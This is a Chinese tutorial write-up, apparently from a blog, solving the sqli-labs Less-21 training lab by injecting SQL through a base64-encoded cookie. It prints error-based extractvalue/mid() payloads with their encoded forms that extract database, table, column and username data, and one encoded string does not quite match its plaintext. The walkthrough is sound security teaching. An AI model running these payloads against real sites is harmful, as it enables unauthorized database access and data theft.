【网络安全】sqli-labs Less-21 解题详析

本文详细解析了如何在基于Base64加密的环境中进行Cookie注入,涉及手工注入、sqlmap加密注入、报错注入方法,以及mid函数的应用,展示了在网络安全课程中Sqli-LabsLess-21的解题过程。

正文

该题考察base64加密的cookie注入

该题有两种注入方式,本文分享手工注入知识,另一种是sqlmap加密注入。

sqlmap加密注入参考: 【网络安全】sqlmap加密注入教程+实战详析

在这里插入图片描述
经测试得到正确的用户名dumb,密码dumb并抓包

在这里插入图片描述

RHVtYg%3D%3D 经过base64解密得到 Dumb ,故可利用cookie参数进行sql语句注入

该题采用报错注入,原理及姿势可参考:【报错注入 | sqli-labs Less-5实战】

查库名

Dumb') and extractvalue(1,concat(0x23,database()))#

这里构造’)的原因可通过页面回显得出,不再赘述。

经过加密得到:

RHVtYicgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLGRhdGFiYXNlKCkpKSM=

在这里插入图片描述
可知库名为security

查表名

Dumb') and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema = database())))#

加密后得到:

RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHgyMywoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hID0gZGF0YWJhc2UoKSkpKSM=

在这里插入图片描述
得到四个表名

查列名

Dumb') and extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')))#

加密后得到

RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHgyMywoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWEgPSBkYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lID0gJ3VzZXJzJykpKSM=

得到三个列:

在这里插入图片描述

查数据

该姿势使用到mid函数,参考文章: 【mid函数原理、应用及实战讲解】

以获取username列的数据为例,利用mid函数构造POC:

Dumb') and extractvalue(1,concat(0x23,mid((select group_concat(username) from users),1,32)))#

加密后得到:

RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHgyMyxtaWQoKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUpIGZyb20gdXNlcnMpLDEsMzIpKSkj

结果如图:

在这里插入图片描述
接着,我们提取从第 32 个字符开始的长度为 32 的子字符串:

POC如下:

Dumb') and extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),32,32)))#

加密后得到:

RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHgyMyxtaWQoKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUpIGZyb20gc2VjdXJpdHkudXNlcnMpLDMyLDMyKSkpIw==

结果如图:

在这里插入图片描述

总结

以上为【网络安全】sqli-labs Less-21 解题详析,考察base64加密、报错注入、mid函数等知识点及姿势,后续将分享【网络安全】sqli-labs Less-22 解题详析。

评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值